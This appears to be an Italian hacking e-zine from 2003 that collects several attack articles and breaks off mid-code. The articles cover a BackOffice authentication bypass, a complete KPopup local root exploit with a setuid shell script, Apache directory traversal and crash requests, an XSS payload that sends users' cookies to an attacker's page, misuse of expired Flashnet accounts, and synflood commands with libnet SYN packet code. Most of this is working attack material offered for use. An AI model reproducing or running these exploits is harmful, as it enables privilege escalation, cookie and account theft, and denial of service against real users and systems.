Eheheh dunque a conclusione quello che voglio dirvi è che è possibile che utenti
non  autorizzati  possano  scavalcare l’autenticazione  dell’host  di  Microsoft
BackOffice…  come?? Semplice … basta inviare una richiesta HTTP direttamente  al
services.asp  (Boadmin/Backoffice/Services.asp) per  scavalcare  lo  schermo  di
login  e il gioco è fatto… siamo dentro eheheh tutto qui!!! Si ragazzi 3 ore  di
testo   …   tutto   sto  bordello  per  dirvi  in  4  parole   che   se   aprite
Boadmin/Backoffice/Services.asp  evitate  la  schermata  dove   vi   chiede   di
autentificarvi e entrate direttamente nel service.asp!!! sono bastardo lo so, vi
dovevo  fare  una capa tanta di cazzate!! Hehehe scusatemi ma ricordate  che  vi
voglio bene!!! Per le vostre considerazioni, insulti, parolacce, potete inviarmi
una  mail … qualsiasi commento sarà gradito davvero!! Me lo merito dopo  che  vi
tengo  ore e ore a leggere! Ciao wagliù un saluto dal vostro Cyberdude  ;)  alla
prossima !!!                                                 [ 4 Novembre 2003 ]


+--------------------------------------------------------------[open the file]-+
|[ HACKiNG ]                                                                   | 
|-- Come ottenere privilegi ellevati tramite KPopup                            |
|-- Marsio <marsio@securitynode.org>                                           |
|                     _________________________________________________________| 
|____________________/ 
Come ottenere privilegi ellevati tramite KPopup
 ================================================


KPopup è un programma KDE che permette di mandare e ricevere messaggi MS Windows
WinPopup.  Una vulnerabilità che spiegherò qui di seguito permette  di  ottenere
privilegi elevati.


L'applicazione  usa  la  chiamata  system()  che  viene  considerata  pericolosa
specialmente  sui  setuid root binaries. Esistono anche  dei  bug  sulle  format
string  nella funzione sprintf(), in questo articolo però mi fermerò a  spiegare
come  ottenere  privilegi  root  sfruttanto la  vulnerabilità  nell'applicazione
system().  Ci sono 3 luoghi nel sorgente misc.cpp dove viene usato system(), una
possibilità per exploitare questa vulnerabilità arriva nella line 106:


void sendSignalForNewMessage() {
char command[50];
sprintf(command, "killall -USR1 kpopup");

system(command);
}



Abbiamo bisogno di una shell script e di una chiamata al killall nella directory
/tmp.  Ecco un esempio di come sfruttare questa vulnerabilità:


#!/bin/sh
cd /tmp
/bin/cat > shell.c << EOF
#include <stdio.h>
int main()
{
setuid(0);
setgid(0);
execl("/bin/bash", "-bash", NULL);
return 0;
}
EOF

/usr/bin/gcc /tmp/shell.c -o /tmp/shell
/bin/chown root.root shell
/bin/chmod 6711 shell
echo "NOW HERE IS YOUR ROOT SHELL"
/tmp/shell


Dopo  aver creato il file nella cartella /tmp, killall e chmod +x, l'unica  cosa
che ci resta da fare è la seguente:

export PATH=/tmp:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin
export
PATH=$PATH:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin
:


Una volta fatto questo, il gioco è fatto! otterremmo il seguente:

/usr/local/kde/bin/kpopup root shell

Come possiamo notare ora abbiamo privilegi root.



Riporto di seguito il codice dell'exploit:


/*Local root exploit for kpopup
 *by b0f www.b0f.net
 */
#include <stdio.h>
int main()
{
setenv("PATH=/tmp:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:\
/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin:");
FILE *fd;
fd = fopen("/tmp/killall", "w");{
fprintf(fd, "#!/bin/sh\n");
fprintf(fd, "cd /tmp\n");
fprintf(fd, "/bin/cat > shell.c << EOF\n");
fprintf(fd, "#include <stdio.h>\n");
fprintf(fd, "int main()\n");
fprintf(fd, "{\n");
fprintf(fd, "setuid(0);\n");
fprintf(fd, "setgid(0);\n");
fprintf(fd, "execl(\"/bin/bash\", \"-bash\", NULL);\n");
fprintf(fd, "return 0;\n");
fprintf(fd, "}\n");
fprintf(fd, "EOF\n");
fprintf(fd, "/usr/bin/gcc /tmp/shell.c -o /tmp/shell\n");
fprintf(fd, "/bin/chown root.root /tmp/shell\n");
fprintf(fd, "/bin/chmod 6711 /tmp/shell\n");
fprintf(fd, "echo NOW HERE IS YOUR ROOT SHELL\n");
fprintf(fd, "/tmp/shell\n");
fclose(fd);
system("chmod +x /tmp/killall");
system("/usr/local/kde/bin/kpopup root shell");
return 0;
}
}




          ::[ MARSIO ]::

    ___  ___ ___ ___  ____       
    | |  | | | || |  | | \       
    | |  | | | || |__| |  \      
    | |__| | | ||  __  | @ \     
     \____/  |_||_|  |_|_|\_\    
                                 

::[ Research & Development ]::
::[ Stage2 @ 2003 ]::
::[ www.uiha.tk ]::



+--------------------------------------------------------------[open the file]-+
|[ HACKiNG ]                                                                   | 
|-- Piccolo Bug Di Kazaa                                                       |
|-- LordScinawa <is_LordScinawa@email.it>                                      |
|                     _________________________________________________________| 
|____________________/ 
Qui  riporto  un piccolissimo bug di Kazaa, il noto programma di  file  sharing.
Chiaramente, quando il programma è aperto, e non si è connessi alla rete, alcuni
pulsanti  vengono disabilitati (Search, Traffic, Tell A Friend).  Ecco  come  ho
fatto  per  usare  cazzà in tutte le sue funzionalita (a parte  quelle  che  non
comprendono il supporto della rete, come Search e il Download dei File):

1)Cliccate sul pulsante browser su Kazaa.
2)Andate su File e premete Disconnect
3)Chiudete il programma (anche dalla striscia di avvio, nei pulsanti in basso  a
destra)
4)Aprite Kazaa
5)Adesso  win,  tramite  una  finestra vi dirà che  per  viualizzare  la  pagina
(tramite il browser Kazeeresco) bisogna essere connessi ad internet. I pulsaqnti
non sono disabilitati, però la finestra del programma non è in primo piano e non
ci si può cliccare sopra perchè win non lo premette.
Problema: Come fare ad arrivare una finestra che mi permetta di mettere Kazaa in
primo piano?
Se  premo  il  pulsante  "non in linea", Kazaa torna il primo  piano,  mentre  i
pulsanti vengono disabilitati.
QUINDI
6)Nella finestra in cui compare il messaggio sopracitato, premete "connetti".  A
questo  punto vi comparirà la finestra di connessione, che permette di spostarsi
da una finestra ad una applicazione. I PULSANTI DI KAZAA NON SONO DISABILITATI.

VaNtAgGi

I  vantaggi di questo grande bug sono talmente tanti che ne elencherò solo  uno.
Kazaa  permette, durante il downmload di un video di vederne la parte  scaricata
con  la funzione Theater. Per vedere un file bisogna evidentemente selezionarlo,
dal  Pulsante Traffic, che però è disabilitato se non si è connessi. Con  questo
semplice  exploit possiamo vedere la parte di film che abbiamo  scaricato  senza
spendere un Euro...
                                                   
LordScinawa


+--------------------------------------------------------------[open the file]-+
|[ HACKiNG ]                                                                   | 
|-- L'indiano buggato                                                          |
|-- Korn <fury10@hotmail.com>                                                  |
|                     _________________________________________________________| 
|____________________/ 
a Little intro:
Rieccomi finalmente a scrivere per INformazione Libera;e' dal primo numero   che
non  scrivevo un'articolo infatti cyberdude mi aveva messo tra gli exmembri...Il
passato e' il  passato..

A little but powerful disclaimer:
queste  informazioni  sono  sviluppate solo per  essere  utlili  ad  admin  e  a
sistemisti  nell'aministrazione delle loro macchine. Se vengono  usate  in  modo
improprio , la responsabilita' e' solo dell'utente  che ne usufruisce.

let's start:
In  questo articolo vorrei parlare di un bug di Apache per windows. quando  esso
riceve  8192  bytes  in  una richiesta , va in crash  internamente  ,  manda  un
messaggio  all'amministratore e lascia la connessione aperta  continuamente.  Il
problema  piu  pesante  in  questo  bug e' l'allocazione  della  memoria.Infatti
possiamo  mandare  oltre alla richiesta di 8192 byte altre  100  stringhe  dello
stesso volume. In windows nt l'attacco e' pericoloso perche'l'amministratore  e'
l'unico  che  puo'  vedere i messaggi e la lunga lista di connessioni  in  stato
idle.Peccato  non  sia  un bof quindi nn puo' essere  usato  da  remoto.  volete
passare  ai fatti e sapere come possiamo incasinare il trasporto di  un   server
web  per linux su una macchina winzoz? "Chiedete e vi sara' dato" diceva un uomo
famoso piu o meno 2000 anni fa.


1) GET (8184 of "/") /

2) HEAD /(8182 of "A") /

3) GET (8184 of "/") /
for 100 times:
Accept: (8182 of "/")

4) GET (8177 of "/") HTTP/1.0


ekkovi  le  vostre brave rikieste. un'altro bug per la vostra gioia: Questo  bug
non  e'  pericoloso in quanto non fornisce accesso remoto al sistema o ad  altri
dati,  ma per un attacker e' utile riuscire ad avere sempre piu' informazioni  e
dettagli riguardo il server per lanciare attacchi piu' efficaci. Con questo  bug
possiamo  vedere il percorso ove e' installato Apache, cosi' ad esempio possiamo
sapere  se il server gira su una macchina Windows, se e' la seconda versione  di
Apache (Apache2) e naturalmente la versione del server (tutte informazioni utili
se  l'amministratore  ha  oscurato il campo Server od  altre  info  riguardo  il
server,  cosi' se il bug e' presente, sapremo per esempio che e' installata  una
versione  di Apache antecedente la 2.0.40). Il bug in questione comunque  sembra
essere  dovuto solo ad alcune configurazioni inerenti il linguaggio da usare  di
default.

Comunque ecco un esempio.

Dal         browser         inseriamo        la        seguente         stringa:
http://127.0.0.1/error/HTTP_NOT_FOUND.html.var

Dopodiche' il server ci rispondera' con questa pagina:

|Not Acceptable
|
|An appropriate representation of the requested resource
/error/HTTP_NOT_FOUND.html.var could not be found on this server.
|Available variants:
|
| * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type
text/html, language de
| * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type
text/html, language en
| * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type
text/html, language es
| * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type
text/html, language fr

Come possiamo vedere il server ci risponde riportando tutto il percorso del file
che  abbiamo  richiesto. Possiamo richiedere tutti i files .var nella  directory
error ed avremo lo stesso risultato.

Maggiori dettagli sono reperibili sul sito di Apache http://httpd.apache.org

Il  seguente  problema  e' inerente la gestione dei caratteri  "pericolosi"  che
possono  essere  utilizzati  per  lanciare  alcuni  attacchi,  come  appunto  il
directory traversal. Infatti il carattere backslash ('\' == %5c) e' riconosciuto
dal  webserver  tra  questi  caratteri "particolari",  ma  il  problema  risiede
nell'utilizzo da parte dell'attacker di directory "esterne" quali  /cgi-bin/  ed
/error/.  Di conseguenza i sistemi vulnerabili sono tutti quelli che  utilizzano
il backslash per delimitare i percorsi (Windows, Netware e OS2).

Ecco alcuni esempi:

per             vedere             il             file             winn\win.ini:
http://127.0.0.1/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini

per eseguire l'utility wintty nella cartella Apache2/bin:
http://127.0.0.1/cgi-bin/%5c%2e%2e%5cbin%5cwintty.exe?%2dt+HELLO

In una forma piu' "leggibile" queste due stringhe significano:
http://127.0.0.1/error/\..\..\..\..\winnt\win.ini
http://127.0.0.1/cgi-bin/\..\bin\wintty.exe?-t+HELLO

Cosi' nel primo esempio noi possiamo andare giu' fino al root con
\..\..\..\..\ in quanto ci troviamo in
"c:\programmi\Apache Group\Apache2\error".
Invece  nel  secondo esempio utilizziamo /cgi-bin/ e passiamo gli argomenti  con
"file.exe?arg1+arg2+arg3+...".

potete trovare tutte le patch sul sito di apache.

Alla prox gente (per kualke kosa , flame o numeri di bella ragazze possibilmente
romane e disponibili fury10@hotmail.com)



+--------------------------------------------------------------[open the file]-+
|[ HACKiNG ]                                                                   | 
|-- HTML Injection, come, dove e perchè                                        |
|-- Bigalex <b1galez@hotmail.com>                                              |
|                     _________________________________________________________| 
|____________________/
     ----==[ HTML Injection, COME, DOVE e PERCHÈ ]==----
&lt &gt
Ricordo  che  diversi anni fa c'era un sito che permetteva di avere  un  dominio
del  tipo  ciao.com, .net o .org gratuitamente  per un anno, dopodichè bisognava
acquistarlo.  E  ricordo  che  anche io avevo il mio  dominio,  bigalexitaly.com
(bigalex.com  era già stato preso :( ). Era  una figata, solo che   aveva  della
pubblicità  in  alto  che  dava abbastanza  fastidio.  Mi misi  e,  macchinando,
riuscii a  toglierla, grazie a quello  che oggi chiameremmo HTML Injection.


Cos'è l'HTML Injection?
Si  tratta dell'inserimento di codice arbitrario nel codice HTML. Direte  voi 'E
che   minchia me  ne frega?' (espressione alquanto colorita, devo  dire).  E  vi
dico  io  invece   che è una cosa interessante perchè oltre al codice  del  tipo
"><SCRIPT>alert("Ciao!")</SCRIPT>   è  possibile   inserire   anche   roba   più
interessante  (continuate  a leggere, che vi lascio  la  suspance!).  Il  codice
potrebbe        anche        essere       sostituito        dal        seguente:
%22%3E%3Cscript%3Ealert%28%22Ciao!%22%29%3C%2Fscript%3E  Esso    viene   infatti
ugualmente  riconosciuto ed  elaborato da un normale browser  e  si  ottiene  lo
stesso effetto.


Dove applicare la tecnica dell'HTML Injection?
Per  usare la tecnica  dell'HTML Injection sono due le condizioni necessarie per
la buona riuscita del 'test'.
-  Prima cosa bisogna che un sito mostri qualcosa a molti utenti, ad esempio  un
sito di annunci personali sarebbe perfetto.
-  Seconda  cosa  ovviamente bisogna che il sito sia vulnerabile  (e  non  lo  è
sempre;  alla fine vi  spiegherò come appunto è necessario che siano  le  pagine
affinchè il sito sia protetto contro l' attacco in questione).

Il  sito  deve avere in pratica  un box ove sia possibile inserire dei dati  (ad
esempio del testo  da mostrare poi agli altri utenti). Sarebbe ancor meglio   se
avesse  uno  spazio per inserire una foto. Direte voi 'Si, ma al  massimo  posso
farli  uscrire scritto Ciao! Questa tecnica è inutile!!'. E qui viene il  bello.
In  Java  Script è presente un comando interessante e cioè Document.Cookie  (che
non è un comando, ma una variabile, vabbè :) e che mostra i cookies attivi nella
pagina. A questo punto ciò che dovremo fare è semplicemente inviarcelo, in  modo
da  avere  i  cookies  di  tutti gli utenti. Come fare  per   invircelo?  Sembra
difficile  ma  non  lo è affatto, basta fare una  pagina in php  (o  in  asp,  a
scelta,  ma io preferisco di più il php, l'asp fa un pò cagare :) che  si  segni
tutti i cookies (ad esempio in un database, questo poi potete deciderlo voi come
più  vi  pare  :)  degli  utenti. La pagina php sarà linkata  in   questo  modo:
mettiamo  che   il sito da attaccare abbia uno spazio per mettere una  foto.  Il
codice  per  inserire  una  foto  è <IMG src="immagine.jpg">.  A  questo   punto
interveniamo noi inserendo il nostro codice
http://miosito.com/script.php?cookie="+document.cookie+" (virgolette  comprese!)
che  ci  permetterà di inviare le informazioni al nostro sito. Se  vogliamo  poi
fare  qualcosa di ancor più pulito, possiamo far si che la nostra  pagina  invii
anche  un'immagine,  cosicchè nessuno si accorga di nulla. Per  fare  tutto  ciò
occorre  però che l'immagine sia linkata alla sua effettiva posizione e non  sia
scaricata dal sito e collocata in uno spazio sul sito (cioè in pratica il nostro
browser             deve             caricare             la              pagina
http://miosito.com/script.php?cookie="+document.cookie+"  e  non l'immagine  che
il      sito     carichi      in      uno     spazio     suo      ad     esempio
http://sito.daattaccare.com/upload/immagine287364.jpg altrimenti ovviamente  non
funzionerà!!).


Come ovviare all'HTML Injection?
Per  risolvere  questo  problema basta effettuare una semplicissima  operazione:
sostituire   rispettivamente i caratteri \, ", ', con i caratteri  \\,  \",  \'.
Bisogna   inoltre eliminare  ogni tipo di tag HTML (cioè <SCRIPT> ad   esempio).
Per  questa  operazione esistono funzioni apposite in php (si veda  la  funzione
striptags()) e credo ve ne siano di  simili anche in asp. Prima di usare  queste
funzioni   consiglio  però   di  convertire  i  caratteri  %22,  %3E  %3C,   %27
rispettivamente   nei  caratteri ", >, <, ' in modo da eliminare  anche  i  tags
scritti  in hex che potrebbero essere elaborati dal browser.


Saluti:
Un saluto va al lab multivac e a cyber_ninja :)

--
BiGAlex
E-Mail: b1galez@hotmail.com



+--------------------------------------------------------------[open the file]-+
|[ HACKiNG ]                                                                   | 
|-- Webmail di Flashnet.it                                                     |
|-- Unrelated <unrelated@libero.it>                                            |
|                     _________________________________________________________| 
|____________________/
+------------------------------------------------------------------------------+
..:•
....•
....•
..•
...•
......•
........•
........•
.........
.........•...•
.....•.••
...........
......•.............
........•.••.............
••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
...••••••••...••••••••..........        WebMail di FlashNet.it        ..........
...•.••••••.•••••...............................................................
.••••••••••••••••............          Lord Unrelated Lodeguns .................
•••••••.••••••••••..............................................................
.................................       13 Novembre 2003 20.20  ................
••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••

Chiunque sta leggendo questo articolo  è quasi  certo che  sappia cosa  sono  le
flashnet, anzi cos'erano infatti come tutte  le  flat  sono destinate a  scadere
a staccarsi o a diventare 709... ma io da  "vampiro" non  ci sto.      Allora mi
collego a flashnet.it e cerco un modo per sfruttare  la  user  e   la   pass  di
quell'account scaduto, e cosa trovo? Aliases e Pass non  sono  sostituibili ma..
e quando dico ma... dovete  sempre stare  attenti... la  casella  webmail  funge
benissimo... ma ma ma ma  baffanculo... lol  qualcosa di + no???        no q-_-p
ma diciamo che mi accontento...
ecco la prova visibile... quindi che  dire... l'usura  di flashnet  non  termina
, fatevi sboroni con  il vostro  account "crakkato" se  vi  sentite  del  giusto
spirito lamah :D un  servizio  gratuito anche  se  illegale  può  essere  sempre 
utile :d 

 ----- Original Message ----- 
 From: <unr3la86@flashnet.it>
 To: <unrelated@libero.it>
 Sent: Thursday, November 13, 2003 4:26 PM
 Subject: caro unrelated


 > 
 > 
 > caro unrelated se ricevi questa mail
 > sei in un mare di pasticci che nemmeno te lo immagini
 > infatti significa che queste pass fungono ancora
 >



 <cyberdude> :)
 <cyberdude> scusami me lo spieghi?
 <cyberdude> l'hai scritto in una forma che dovrei rileggerlo 3 o 4 volte per 
             capirlo!
 <cyberdude> che hai detto?
 <cyberdude> sei un pò fuso è?
 <unrelated> lol
 <unrelated> come ci ho messo giusto 5 minuti per scriverlo
 <unrelated> semplicemente se vai su flashnet
 <unrelated> .it
 <unrelated> e hai una flat
 <unrelated> vecchia di flashnet
 <unrelated> puoi sfruttare la sua webmail
 <cyberdude> :( 
 <unrelated> :(
 <unrelated> perchè?
 <cyberdude> e che ce ne facciamo della sua webmail?
 <cyberdude> a questo punto allegavi pure la flat!
 <unrelated> mandavi email
 <unrelated> no
 <unrelated> perchè non è la stessa
 <unrelated> per tutti
 <cyberdude> fammi capire ... la usi come casella postale?
 <cyberdude> e basta?
 <unrelated> si invi email e la usi come casella postale
 <unrelated> tipo libero
 <unrelated> e basta
 <unrelated> solo che al posto di libero
 <unrelated> hai email@flashnet.it
 <unrelated> se non lo vuoi pubblicare lo capisco
 <unrelated> è una merdata
 <cyberdude> non mi sembra una cosa eclatante... tutto qui
 <cyberdude> capisci? 
 <unrelated> ma funge
 <cyberdude> uno rischia per cosa?
 <unrelated> per mandare mail anomale ed in un certo senso anonime
 <unrelated> perchè le invii da un server
 <unrelated> estraneo
 <cyberdude> ... allora fai 1 cosa, riscrivilo in modo più comprensibile 
 <cyberdude> e spiega bene
 <cyberdude> cosa possiamo fare
 <cyberdude> ok?
 <cyberdude> fai finta che il lettore sia un newbie!
 <unrelated> uff sai che faccio 
 <cyberdude> immagina di doverlo spiegare a NEO
 <unrelated> ora copio questa discussione 
 <unrelated> dalla testa ai piedi

Scusatemi  per  questo  articolo...      lol ... non  picchiatemi...  tux tux no
e basta.. no  non  staccatemi il  filo  internet...  nooooooooo ooo ops...  devo
firnirla di bere latte e cacao prima di writtare tutor.

......•••.•••••••••••••••................
.......•••.•••.•...••.•••.............
.......•••••••••••.••.............
..........••••••••••••.•...............
........•••••••••••......••••••.......
.......••.•....•••..........•..
.............................
............................
..............................
.............................F
..............................F .`.(
...............F 44
........)(J)).
..)F"`
..F .  
(F 4
4)
..

--< unrelated at libero dot it >------------------------------------------------
--------------------------------------¤ Lord Unrelated Lodeguns ¤---------------
¢•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
 

+--------------------------------------------------------------[open the file]-+
|[ HACKiNG ]                                                                   | 
|-- Packet Injection (Internet Direct Attack)                                  |
|-- Evil <webmaster@eviltime.com>                                              |
|                     _________________________________________________________| 
|____________________/

    Autore: Evil
    Titolo: Packet Injection (Internet Direct Attack)
    Http:   www.eviltime.com
    Email:  webmaster@eviltime.com

---Sommario---------------------------------------------------------------------


    (Introduzione)
    (Internet layers)
    (Packet build)
    (Injector come sniffer)
    (Packet injecting)
    (Tools: Packet injector with libnet)
    (Conclusione)

---Introduzione-----------------------------------------------------------------

In  questo  tutorial  tratterò  lo studio del  tcp/ip  a  basso  livello  e  più
precisamente di una tecnica molto utile, ovvero il packet injecting.. Con questa
tecnica e con quindi un tool chiamato, packet injector, si può controllare tutto
il traffico nella propria rete (sniffing), e inserire nuovi pacchetti creati  da
voi nella conversazione (injecting), nel tutorial verrà trattato tutto questo in
modo  da  riuscire  una  volta letto questo documento, a programmare  un  vostro
packet  injector, ad esempio il detecting via sniff di un pacchetto  che  appena
ricevuto,  comporterà a far comportare adeguadamente l'injector a seconda  della
situazione.

---Internet layers--------------------------------------------------------------

La chiave del funzionamento di Internet è il layering, quando una macchina host1
trasmette dati a un altra macchina host2, i dati trasmessi passeranno prima  per
altri protocol layers più o meno indipendenti, che svolgono ognuno una parte del
lavoro  necessario, proprio come i vari settori in una fabbrica, una  specie  di
catena di montaggio. Parliamo ora quindi di questi layer, esattamente tre.. (per
internet):

 1- | Transport layer |
Questo  prende tutti i dati passati, e li divide in tanti piccoli  pacchetti,  è
usato da due protocolli molto conosciuti, TCP (Transport Control Protocol) e UDP
(User  datagram Protocol).    Con una sola piccola differenza, mentre l'UDP  non
da  nessuna conferma di ritorno il TCP, assicura via ritrasmissione che  i  dati
sono  passati  per  la rete, e soprattutto che sono integri (CheckSum).    Fatto
questo viene lasciato il resto del compiti al prossimo layer..

 2- | Internet layer  |
Questo  assegna  a  tutti  gli host un identificazione unica  (indipendentemente
dall'hardware)  e 'routa' i pacchetti dal mittende al destinatario,  senza  però
assicurare  di una corretta trasmissione.Il protocollo usato da questo  layer  è
l'IP (Internet protocol), e quindi comprende frammentamento ecc..

 3- | Link layer      |
Questo  invece  dipende dai vari tipi di connessione 'hardware', possono  essere
quindi  broadcast  networks, e quindi avere un certo tipo  di  comportamento,  o
connessioni normalissime e quindi averne un altro, ma ad ogni modo, i protocolli
usati saranno sempre BBE, IEEE 802, X.25, PPP, SLIP e l'IP

Come abbiamo visto ogni layer aggiunge qualche pezzo di dati in più, e anche  se
non  citati,  esistono  molti protocolli di supporto, come  nelle  comunicazioni
locali,  l'arp  e  rarp  per  trovare indirizzi  ethernet,  lcp,  ipcp  e  altri
protocolli per il ppp connection negotiation, comunque anche per le applicazioni
user-level possono venire usati, FTP, Telnet, HTTP, DNS..

---Packet build-----------------------------------------------------------------

Come  tutti  sappiamo "l'arte" del packet building, non è una cosa  semplice  da
spiegare,  quindi qui ho solo fatto un supporto per la maggior  comprensione  di
qualunque testo che tratti in modo particolare questo argomento. Quindi prima di
tutto vediamo la forma tipica di un pacchetto:

                   +----------------------------------+
                   | Ethernet header |  Main packet   |
                   +----------------------------------+

Il  primo  blocco  è  richiesto ed è usato per determinare  da  dove  arriva  il
pacchetto  di  che tipo è ecc.., e per indicare la fine del primo  blocco  basta
inserire  il   carattere  'e' nel pacchetto, (end of  ethernet  header).  Quindi
veniamo al secondo, prendendo come esempio un TCPIP main packet:

                      +----------------------------+
                      | IP datagram |  TCP packet  |
                      +----------------------------+

Questo  main  packet  è  a  sua volta suddiviso in  più  sotto  parti..  Ma  per
concludere in modo comunque già esaudiente per quello che interessa noi  si  può
dire che un pacchetto tcp assume questa forma:

           +---------------------------------------------------+
           | Eth. header | IP datagram | TCP Header | TCP Data |
           +---------------------------------------------------+

Mentre un pacchetto ARP che quindi non si serve dell'IP, sarà semplicemente

                +----------------------------------------+
                | eth. header |       ARP packet         |
                +----------------------------------------+

Avremo  quindi finito il nostro piccolo capitolo, questo solo perchè  altrimenti
andrei a scrivere decine di pagine che comunque sono trovabili ovunque.

---Injector come sniffer--------------------------------------------------------


Una  volta  aperto un injector, sarete in grado di vedere tutto quello  che  sta
succedendo nella vostra rete locale. Un injector completo è diviso in due parti:

 . Network sniffer
 . Console

Nel  network sniffer, tutti i pacchetti che passano attraverso la rete,  saranno
stampati  a  video, dall'injector stesso. Fatto questo il programma  provera  ad
identificare i tipi di pacchetti ricevuti il mittente, e il destinatario,  e  ne
stamperà  il  contenuto.  Nella  seconda  parte  invece,  puoi  interagire   con
l'injector,  quindi  impostare  filtri, per  evitare  di  vederti  centinaia  di
pacchetti  inutili  passare per il tuo monitor senza aver il  tempo  di  leggere
quelli che ti interessano, e un injector può filtrare i pacchetti in molti  modi
quali:

 - Tipo del pacchetto
 - Tipo del pacchetto in un IP datagram
 - Source IP
 - Destination IP
 - Source Port
 - Destination Port

E  per  evitare di stare davanti al pc, per controllare il traffico, si  possono
usare  2  tipi di logging, quali il normal log e il raw log, presenti  in  quasi
qualunque injector... Finito questo possiamo andare a vedere il vero compito  di
un injector, ovvero il packet injecting

---Packet injecting-------------------------------------------------------------

Siamo quindi arrivati alla funzione madre di ognuno di questi tipi di tool.  Ora
grazie a questa funzione potrai mandare tutti i dati che vuoi nella tua  lan, (e
non  solo).  dopo  aver  creato  un  pacchetto possiamo  dunque  renderlo  parte
integrante  di  una  comunicazione attiva in rete, questo, usando  una  funzione
apposita  dell'injector.  Mettiamo  caso che  il  nostro  pacchetto  si  chiami:
our.pkt, la nostra sessione risulterà la seguente:

    set infile our.pkt
    do inject

con  questi comandi non abbiamo fatto altro che dichiarare il nome del pacchetto
che  vogliamo  iniettare,  e con 'do inject' abbiamo dato  ordine  di  inviarlo.
questo  è  il  comando base per mettere in atto l'injecting di un pacchetto,  ma
dobbiamo, assolutamente, far sapere all'interprete, quali siano il mittente e il
destinatario .

   setmyeth aa:aa:aa:aa:aa:aa
   setethto bb:bb:bb:bb:bb:bb
   set filleth 5
   set fillethto 5
   set infile ping.pkt
   do inject

Ok  con  questo  non abbiamo fatto altro che mandare un pacchetto  con  ethernet
header,  con (setmyeth) settiamo il nostro indirizzo ethernet, e con il seguente
settiamo  l'indirizzo destinatario (setethto), e così dopo aver settato  filleth
source  e  filleth  destination, e così finiamo  mandando  il  pacchetto,  ormai
completo di tutto..  Qualche altro comando utile può essere,

   getarpto

questo  comando serve per arrivare a sapere quale è il corrispondente  indirizzo
fisico della machcina indicata prima:

   set arpip 192.168.0.1
   do getarpto

possiamo  anche usufruire di comandi veramente 'facoltativi' negli injector,  ma
che possono comunque essere sempre utili, quindi possiamo praticare un flood

   set infile my.pkt
   set pktnumber 1024
   do flood

o praticare un synflood con meno di una decina di dichiarazioni

   set arpip 10.0.0.1
   do getarpto
   set fillethto 3
   set synip 10.0.0.1
   set synportfrom 25
   set synportto 80
   set synpkt 5000
   do synflood

basta   infatti  gettare  l'indirizzo  ethernet,  quindi  settare   il   filleth
destination  quindi  l'ip  da synflooddare, la porta  sorgente  e  la  porta  di
destinazione  e  chiudere con il numero di pacchetti da mandare,  e  il  comando
essenziale.

Possiamo quindi concludere che un packet injector 'completo' svolge tre funzioni
base, che si susseguono, ed esse sono:


 +--------------------+    +-----------------+    +-------------------+
 | Packet interceptor | -D | Packet injector | -D | Packet classifier |
 +--------------------+    +-----------------+    +-------------------+

---Packet injector with libnet--------------------------------------------------


Qui  rilascierò il sorgente di un programma, trovato per la rete,  nulla  a  che
vedere con i programma-mito, che si possono trovare in rete come PDUMP, direi un
pò  il  simbolo  di  questa scena. (http://pdump.org) Pubblico questo  sorgente,
perchè  mi è molto piaciuta come idea, e soprattutto è un buon spunto e  esempio
di studio approfondito delle infinite capacità, delle tanto a noi care libnet.

 #include <libnet.h>

 int main(void)
 {
   /* "network" is returned by `libnet_open_link_interface()'
    * it is used when writing packets and when closing the interface */
   int network;
   /* "packetsize" is used when initializing heap memory with `libnet_init_packet()'
    * and argumented when writing packet */
   int packet_size;
   /* Sent bytes */
   int n;
   /* The packet */
   u_char *packet;
   /* This should be changed into argv[] */
   /* *_ip is returned by `libnet_name_resolve("123.123.123.123", LIBNET_RESOLVE)'..
    * *_port is simple short int */
   u_long	src_ip, dst_ip;
   u_short	src_port, dst_port;

 /* SETTING UP ADDRESSING */
   src_ip = libnet_name_resolve("192.168.9.17", LIBNET_RESOLVE);
   if (!src_ip)
      libnet_error(LIBNET_ERR_FATAL, "Bad dest IP\n");
   src_port = 5000;

   dst_ip = libnet_name_resolve("213.93.39.87", LIBNET_RESOLVE);
   if (!dst_ip)
      libnet_error(LIBNET_ERR_FATAL, "Bad src IP\n");
   dst_port = 80;

 /* DEFINING PACKET SIZE */
   /* Only defining TCP and IP header.. still using link-layer interface though */
   packet_size = LIBNET_IPV4_H + LIBNET_TCP_H;

 /* ALLOCATE MEMORY */
   libnet_init_packet (packet_size, &packet);
   if (!packet)
      libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n");

 /* OPEN NETWORK INTERFACE */
   network = libnet_open_raw_sock (IPPROTO_RAW);
   if (network == -1)
      libnet_error(LIBNET_ERR_FATAL, "Cannot open network interface\n");

 /* PACKET CONSTRUCTION */
   /* Building IP */
   libnet_build_ip (LIBNET_TCP_H,	/* size */
                    IPTOS_LOWDELAY,
                    242,		/* IPID */
                    0,			/* no fragmentation */
                    48,			/* TTL - Time To Live */
                    IPPROTO_TCP,	/* protocol */
                    src_ip,		/* Source IP address */
                    dst_ip,		/* Destination IP address */
                    NULL,		/* Payload */
                    0,			/* length of payload */
                    packet);		/* packet header memory */
   /* Building TCP */
   libnet_build_tcp (src_port,		/* Source TCP port */
                     dst_port,		/* Destination TCP Port */
                     0xa1d95,		/* Sequence number */
                     0x53,		/* Ack number */
                     TH_SYN,		/* Set SYN flag */
                     1024,		/* Window size */
                     0,			/* Urgent off */
                     NULL,		/* Payload */
                     0,                 /* payload length */
                     packet + LIBNET_IPV4_H);	/* packet header memory */

 /* CHECKSUM */
   if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1)
      libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");

 /* INJECTION ;^) */
   n = libnet_write_ip (network, packet, packet_size);
   if (n < packet_size)
